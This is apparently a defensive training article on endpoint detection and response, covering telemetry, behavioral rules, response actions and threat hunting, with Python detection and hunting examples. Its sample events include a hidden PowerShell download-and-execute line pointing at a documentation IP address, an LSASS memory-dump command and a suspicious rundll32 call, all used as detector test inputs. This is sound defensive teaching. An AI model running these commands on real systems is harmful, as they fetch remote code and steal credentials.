EDR: Endpoint Detection, Response, and Threat Hunting
Part of the Cybersecurity Skills Guide — This article is one deep-dive in our complete guide series.
By HADESS Team | February 28, 2026 | Updated: February 28, 2026 | 5 min read
Endpoint Detection and Response (EDR) gives you visibility into what is actually happening on every workstation and server in your environment. Where antivirus asks “is this file known-bad?”, EDR asks “is this behavior suspicious?” — a far more useful question when attackers increasingly operate with fileless techniques, living-off-the-land binaries, and custom tooling that AV signatures will never catch.
Endpoint Visibility
EDR agents collect telemetry on process execution, file system changes, registry modifications, network connections, and loaded modules. This telemetry is the raw material for both automated detection and manual threat hunting.
Key telemetry points that matter for detection:
- Process creation: executable path, command-line arguments, parent process, user context. A cmd.exe spawned by winword.exe is worth investigating regardless of what the command does.
- Network connections: which processes are making outbound connections, to where, and how often. Beaconing patterns (regular intervals with small jitter) are a C2 indicator.
- File operations: new executables written to disk, modifications to system files, changes in auto-start locations.
- Registry changes: modifications to Run keys, service registrations, COM object registrations — common persistence mechanisms.
- Module loads: DLLs loaded into processes. A process loading winhttp.dll that normally does not make HTTP requests is anomalous.
The quality of your detections depends directly on the quality of telemetry your EDR collects. Evaluate EDR products on telemetry depth, not just detection count. Some products hook more API calls and collect more granular data than others.
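The beaconing check from the network-connections bullet above, as an added example in Python (not code from this article or from any EDR product). It runs over a constructed set of outbound-connection events: one process contacts the same destination every 60 seconds with a second or two of jitter, while a browser's traffic is irregular. Process names, destinations and timestamps are all made up for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry as (process, destination, timestamp). The
# "updater.exe" events form a 60 s beacon with +/-2 s of jitter; the browser
# events are irregular. None of this is real data.
BASE = datetime(2026, 2, 28, 9, 0, 0)
JITTER_PATTERN = [0, 1, -1, 2, -2]  # deterministic stand-in for random jitter


def periodic_timestamps(period_s, jitter_s, count):
    ts, t = [], BASE
    for i in range(count):
        t += timedelta(seconds=period_s + JITTER_PATTERN[i % 5] * jitter_s)
        ts.append(t)
    return ts


EVENTS = (
    [("updater.exe", "203.0.113.10:443", t) for t in periodic_timestamps(60, 1, 20)]
    + [("chrome.exe", "198.51.100.7:443", BASE + timedelta(seconds=s))
       for s in (3, 5, 40, 41, 42, 300, 900, 905, 1500, 1501)]
)


def interval_stats(timestamps):
    """Mean gap between consecutive connections and its coefficient of variation
    (stdev / mean). A CV near zero means near-constant spacing, i.e. a beacon."""
    ts = sorted(timestamps)
    if len(ts) < 2:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    if mean <= 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def find_beacons(events, min_events=8, max_cv=0.1):
    """Group connections per (process, destination) and return the pairs whose
    spacing is regular enough to look like C2 check-ins."""
    by_pair = defaultdict(list)
    for process, dest, ts in events:
        by_pair[(process, dest)].append(ts)
    hits = {}
    for pair, ts in by_pair.items():
        if len(ts) < min_events:
            continue  # too few samples to call the spacing regular
        stats = interval_stats(ts)
        if stats and stats[1] <= max_cv:
            hits[pair] = stats
    return hits


if __name__ == "__main__":
    for (process, dest), (mean, cv) in find_beacons(EVENTS).items():
        print(f"{process} -> {dest}: every {mean:.0f}s, CV={cv:.3f}")
```

Treat the regularity score as a hunting lead rather than an alert on its own: software updaters and telemetry agents beacon too, and most C2 frameworks let the operator set a jitter percentage, so in practice you widen max_cv (0.2 to 0.3) and combine the result with destination age or reputation and with the process's expected behaviour.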
Behavioral Detection
Behavioral detection rules look for patterns of activity rather than specific indicators. This approach catches novel threats that signature-based detection misses.
Examples of behavioral detections:
- LSASS access: any process reading memory from lsass.exe is likely attempting credential dumping (Mimikatz, ProcDump, direct syscalls). Allowlist known legitimate tools (security agents, backup software) and alert on everything else.
- Unusual parent-child relationships: outlook.exe spawning powershell.exe, excel.exe spawning cmd.exe, services.exe spawning anything other than expected services.
- Script execution chains: mshta.exe calling wscript.exe calling powershell.exe — each hop adds obfuscation, and the chain itself is the indicator.
- Lateral movement patterns: PsExec service creation (the default service name is PSEXESVC), WMI remote process creation, remote scheduled task registration, or remote service installation from a workstation.
Tune behavioral rules carefully. “PowerShell spawned by Explorer” fires legitimately when users run scripts. “PowerShell spawned by Explorer with encoded command-line arguments downloading content from an external URL” is specific enough to be useful.
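The rules in this section and the tuning point just above, as an added Python example that is not code from the article or from any EDR product. A few process-creation and process-access events are constructed inline and four rules run over them; the parent, expected-child and LSASS allowlist sets are illustrative assumptions to replace with your own baseline. Note that the Explorer-to-PowerShell rule stays quiet on a plain script launch and only fires once the encoded command line is decoded and found to fetch a URL.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Event:
    image: str                    # process image name, lowercased
    parent: str                   # parent process image name
    cmdline: str = ""
    target: Optional[str] = None  # process-access events: whose memory was opened


# Assumed rule data; illustrative, not any vendor's rule set.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
SERVICES_EXPECTED_CHILDREN = {"svchost.exe", "msiexec.exe", "spoolsv.exe", "msmpeng.exe"}
LSASS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}  # tune to your environment

# -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]+)")
URL = re.compile(r"(?i)https?://")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand is base64 over UTF-16LE. Try every candidate
    flag so an earlier -ExecutionPolicy does not hide a later -enc."""
    for m in ENC_FLAG.finditer(cmdline):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None


def run_rules(ev: Event) -> List[str]:
    hits = []
    if ev.parent in OFFICE_PARENTS and ev.image in SHELLS:
        hits.append("office_spawns_shell")
    if ev.parent == "services.exe" and ev.image not in SERVICES_EXPECTED_CHILDREN:
        hits.append("services_unexpected_child")
    if ev.target == "lsass.exe" and ev.image not in LSASS_ALLOWLIST:
        hits.append("lsass_access")
    # Tuned rule: Explorer -> PowerShell alone is noise; encoded + URL is not.
    if ev.parent == "explorer.exe" and ev.image == "powershell.exe":
        decoded = decode_encoded_command(ev.cmdline)
        if decoded and URL.search(decoded):
            hits.append("explorer_powershell_encoded_download")
    return hits


# Constructed sample events (not real telemetry).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENC = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    Event("cmd.exe", "winword.exe", 'cmd.exe /c "whoami"'),
    Event("powershell.exe", "explorer.exe", "powershell.exe -File C:\\Users\\alice\\backup.ps1"),
    Event("powershell.exe", "explorer.exe", f"powershell.exe -nop -w hidden -enc {ENC}"),
    Event("procdump.exe", "cmd.exe", "procdump.exe -ma lsass.exe out.dmp", target="lsass.exe"),
    Event("msmpeng.exe", "services.exe", "", target="lsass.exe"),
    Event("svchost.exe", "services.exe", "svchost.exe -k netsvcs"),
    Event("rundll32.exe", "services.exe", "rundll32.exe evil.dll,Start"),
]


def evaluate(events):
    """Return (index, rule) for every rule hit, in event order."""
    return [(i, rule) for i, ev in enumerate(events) for rule in run_rules(ev)]


if __name__ == "__main__":
    for i, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {i} ({SAMPLE_EVENTS[i].image}): {rule}")
```

The decode step is what makes the tuned rule specific: the base64 blob hides the URL from a plain string match, so a rule that only looks for "-enc" fires on every encoded command, while one that decodes and inspects the script fires on the downloader and not on the user's backup script. Expect evasion, though: the same payload can arrive as a script file, a cmd /c echo piped into PowerShell, or a one-liner with the URL split across variables, so the parent-child and LSASS rules still need to stand on their own.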
Response Actions
When a detection fires and an analyst confirms it is a true positive, EDR provides response capabilities:
- Endpoint isolation: cut the host off from the network while maintaining the EDR management channel. This contains the threat immediately while preserving evidence.
- Process termination: kill the malicious process. Be aware that some malware restarts itself through persistence mechanisms — killing the process without removing persistence just buys time.
- File quarantine: remove malicious files to a quarantine vault where they can be analyzed without execution risk.
- Live response shell: connect to the endpoint for remote investigation — run commands, collect files, check configurations without physically touching the machine.
Automate response for high-confidence detections. If your EDR detects Mimikatz execution with 99% confidence, auto-isolating the endpoint and disabling the associated user account is reasonable. For lower-confidence detections, alert the analyst and let them decide. Whatever you automate, make sure the action is logged and reversible and that critical hosts such as domain controllers are explicitly excluded, because a false positive that isolates one of those is an incident in its own right.
Hunting Queries
Threat hunting uses EDR telemetry proactively, searching for threats that automated detections missed. Write hunting queries based on threat intelligence, ATT&CK techniques, or anomaly detection.
Effective hunting queries:
- Processes running from unusual directories (C:\ProgramData, C:\Users\Public, temp folders)
- Network connections to newly registered domains (domain age less than 30 days)
- Scheduled tasks created in the last 7 days with encoded PowerShell commands
- Processes that have been running continuously for extended periods with periodic network activity
Document successful hunts and convert them into automated detection rules. Every threat you find through hunting represents a gap in your automated detection that should be closed.
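The first three hunts in the list above, as an added Python example that is not from the article: each hunt is a function over constructed process, DNS and scheduled-task events with a fixed hunt time, so the output is reproducible offline. The registration-date table stands in for the RDAP/WHOIS or passive-DNS lookup you would do in production, and the Defender exclusion prefix is an assumption added because Defender's platform binaries legitimately run from under C:\ProgramData and would otherwise flood the first hunt. Hosts, users, domains and dates are all made up.

```python
import base64
import re
from datetime import datetime, timedelta

NOW = datetime(2026, 2, 28, 12, 0, 0)  # fixed hunt time so results are reproducible

# User-writable locations where legitimate long-lived executables are rare.
UNUSUAL_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "c:\\windows\\temp\\")
# Known-good exceptions (assumed; build this from your own baseline).
KNOWN_GOOD_PREFIXES = ("c:\\programdata\\microsoft\\windows defender\\",)
# powershell ... -e/-enc/-EncodedCommand followed by a base64 blob of meaningful length
ENCODED_PS = re.compile(r"(?i)powershell(?:\.exe)?.*\s-e[a-z]*\s+[A-Za-z0-9+/=]{20,}")


def in_unusual_dir(image_path):
    p = image_path.lower().replace("/", "\\")
    if p.startswith(KNOWN_GOOD_PREFIXES):
        return False
    return p.startswith(UNUSUAL_DIRS) or "\\appdata\\local\\temp\\" in p


def hunt_unusual_paths(process_events):
    return [e for e in process_events if in_unusual_dir(e["image"])]


def hunt_young_domains(dns_events, registration_dates, max_age_days=30, now=NOW):
    """Flag connections to domains registered less than max_age_days ago.
    Domains with no registration data are returned separately: missing data
    is itself a lead, not a clean bill of health."""
    young, unknown = [], []
    for e in dns_events:
        reg = registration_dates.get(e["domain"])
        if reg is None:
            unknown.append(e)
        elif (now - reg).days < max_age_days:
            young.append(e)
    return young, unknown


def hunt_encoded_tasks(task_events, days=7, now=NOW):
    cutoff = now - timedelta(days=days)
    return [t for t in task_events
            if t["created"] >= cutoff and ENCODED_PS.search(t["action"])]


# --- constructed sample data (hosts, users, domains and dates are made up) ---
PROCESS_EVENTS = [
    {"host": "WS-017", "image": "C:\\Users\\Public\\svc.exe", "user": "CORP\\alice"},
    {"host": "WS-017", "image": "C:\\Program Files\\Git\\bin\\git.exe", "user": "CORP\\alice"},
    {"host": "SRV-02", "user": "NT AUTHORITY\\SYSTEM",
     "image": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.0\\MsMpEng.exe"},
    {"host": "WS-031", "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\upd.exe", "user": "CORP\\bob"},
]
DNS_EVENTS = [
    {"host": "WS-017", "domain": "update-cdn-7731.example", "process": "svc.exe"},
    {"host": "WS-017", "domain": "packages.example", "process": "git.exe"},
    {"host": "WS-031", "domain": "files-sync.example", "process": "upd.exe"},
    {"host": "WS-031", "domain": "no-whois-data.example", "process": "upd.exe"},
]
REGISTRATION_DATES = {  # stand-in for an RDAP/WHOIS or passive-DNS first-seen lookup
    "update-cdn-7731.example": datetime(2026, 2, 20),
    "packages.example": datetime(2010, 1, 1),
    "files-sync.example": datetime(2025, 6, 1),
}
ENC_BLOB = base64.b64encode("IEX (New-Object Net.WebClient)".encode("utf-16le")).decode()
TASK_EVENTS = [
    {"host": "WS-031", "name": "\\Microsoft\\Windows\\Sync\\Updater", "created": datetime(2026, 2, 26),
     "action": f"powershell.exe -nop -w hidden -enc {ENC_BLOB}"},
    {"host": "SRV-02", "name": "\\Backup\\Nightly", "created": datetime(2026, 1, 10),
     "action": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"host": "WS-017", "name": "\\Maint\\Cleanup", "created": datetime(2026, 2, 27),
     "action": "cmd.exe /c del /q C:\\Temp\\*"},
]


def run_hunts():
    young, unknown = hunt_young_domains(DNS_EVENTS, REGISTRATION_DATES)
    return {
        "unusual_paths": hunt_unusual_paths(PROCESS_EVENTS),
        "young_domains": young,
        "unknown_domains": unknown,
        "encoded_tasks": hunt_encoded_tasks(TASK_EVENTS),
    }


if __name__ == "__main__":
    for hunt, hits in run_hunts().items():
        print(hunt, [h.get("image") or h.get("domain") or h.get("name") for h in hits])
```

Read the three result sets together rather than separately: in the sample, the same two hosts account for the executable in a user-writable directory, the week-old domain and the freshly created encoded task, which is exactly the kind of overlap that turns a hunt into a detection rule worth automating. The exclusion list is the part that needs the most care, since every prefix you add is a place an attacker can hide, so keep it short and review it on a schedule.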
Next Steps
- Assess your endpoint security skills with the skills assessment
- Browse detection and hunting topics in the skills library
- Use the coaching tool to build a threat hunting practice plan
Related Guides in This Series
- Firewall Management: Rules, Zones, and Change Control
- Hardware Security Modules: Key Management and Compliance
- IPTables: Linux Packet Filtering and NAT Configuration
Take the Next Step
Browse 80+ skills on HADESS.
See your certification roadmap.
Get started free — Create your HADESS account and access all career tools.
Frequently Asked Questions
How long does it take to learn this skill?
Most practitioners build working proficiency in 4-8 weeks of dedicated study with hands-on practice. Mastery takes longer and comes primarily through on-the-job experience.
Do I need certifications for this skill?
Certifications validate your knowledge to employers but are not strictly required. Hands-on experience and portfolio projects often carry more weight in technical interviews. Check the certification roadmap for relevant options.
What career paths use this skill?
Explore the career path explorer to see which roles require this skill and how it fits into different cybersecurity specializations.
—
HADESS Team consists of cybersecurity practitioners, hiring managers, and career strategists who have collectively spent 50+ years in the field.
